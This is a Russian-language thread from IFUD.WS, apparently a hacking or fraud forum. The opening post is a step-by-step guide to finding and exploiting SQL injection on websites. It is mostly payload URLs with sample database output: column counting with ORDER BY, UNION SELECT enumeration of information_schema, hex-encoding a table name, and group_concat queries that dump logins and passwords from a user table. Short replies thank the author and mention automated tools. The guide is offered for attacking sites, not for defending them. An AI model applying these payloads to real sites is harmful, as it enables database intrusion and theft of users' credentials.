1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Как найти и раскрутить sql-инъекцию на сайте

Тема в разделе "Чужие", создана пользователем GRID, 8 июн 2012.

  1. TopicStarter Overlay
    GRID

    GRID Гость

    Привет всем.

    В этой статье я постараюсь максимально понятным образом показать вам, как найти и раскрутить sql-иньекцию на сайте. :)

    Нужно найти подобную ссылку на сайте. Пример:
    Код:
    localhost/index.php?id=1
    Теперь нам нужно проверить ссылку на доступ к БД.
    localhost/index.php?id=1' (поставить такой знак ' или " )
    Должно выйти сообщение об ошибки.

    Пример:

    Код:
    SQL: SELECT * FROM news WHERE ID=3'
    MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
    Теперь нам нужно узнать количество строк.
    Код:
    localhost/index.php?id=1+order+by+10 --
    Ошибка!
    Код:
    SQL: SELECT * FROM news WHERE ID=3 order by 10 --
    MySQL Error: Unknown column '10' in 'order clause'
    Значить строк меньше.
    Код:
    localhost/index.php?id=1+order+by+5 --
    Нет ошибки , но строк может быть 6.
    localhost/index.php?id=1+order+by+6 --
    Нет ошибки. :)
    localhost/index.php?id=1+order+by+7 --
    Ошибка! Значить строк 6.
    Теперь вставляем строки.
    Код:
    localhost/index.php?id=-1+union+select+1,2,3,4,5,6 -- (поставим перед id - , чтобы нам не мешалось лишнее)
    Опа! Появились цифры! Можно использовать любую которую ты видишь, я буду использовать 4.
    Вводим вместо цифры 4 version() и видим:
    Код:
    user : u181477@10.10.153.188 database : u181477 version : 5.0.67-log
    В 5-й версии есть infromation_schema.tables (Таблица содержащая названия всех таблиц, в частности с юзерами, и колонка у нее table_name.
    Юзаеццо она так
    Код:
    localhost/index.php?id=-1+union+select+1,2,3,table_name,5,6+from(из)+infor mation_schema.tables
    Многие юзают команду limit, но я вам советую использовать другую команду.
    Есть такая команда как SEPARATOR, который задаёт разделитель при выводе записей (по умолчанию – запятая), она есть только в
    Код:
    group_concat("колонка"+Separator+"разделитель") и нам выведет все содержимое.
    localhost/index.php?id=-1+union+select+1,2,3,group_concat(column_name+SEPA RATOR+0x3a)+from+information_schema.columns+where+ table_name='user'
    Вот тут может быть ошибка, так как есть ' надо user или любую другую таблицу перевести в hex. Сделать то можно Тут (Please login or register to view links)
    Вам покажут пару чисел, удаляете пробелы и вначале ставьте 0x и все получится.
    Код:
    localhost/index.php?id=-1+union+select+1,2,3,group_concat(column_name+SEPA RATOR+0x3a)+from+information_schema.columns+where+ table_name=0x...
    Затем все просто, надо колонки поставить в выводимое поля и сделать запрос на вывод из таблицы наших юзеров.
    localhost/index.php?id=-1+union+select+1,2,3,group_concat(0x3a,login,pass+ SEPARATOR+0x3a)+from+user --
    Удачи. :)


    Автор: hack001
     
    • Like Like x 4
    Метки:
  2. TopicStarter Overlay
    Anti-Sat

    Anti-Sat Гость

    Спасибо.Хорошая статья.Побольше б таких.
     
  3. TopicStarter Overlay
    Anti-Sat

    Anti-Sat Гость

    Ещё б подсказали для чего служат параметры был бы благодарен.
    order-
    by+10-
    union-
    select-
     
  4. TopicStarter Overlay
    phpsellers

    phpsellers Гость

    Спасибо, но для этого есть же программы специальные) Это автоматизирует процесс, и значительно экономит время.
    Спасибо за статью)
     

Поделиться этой страницей

Загрузка...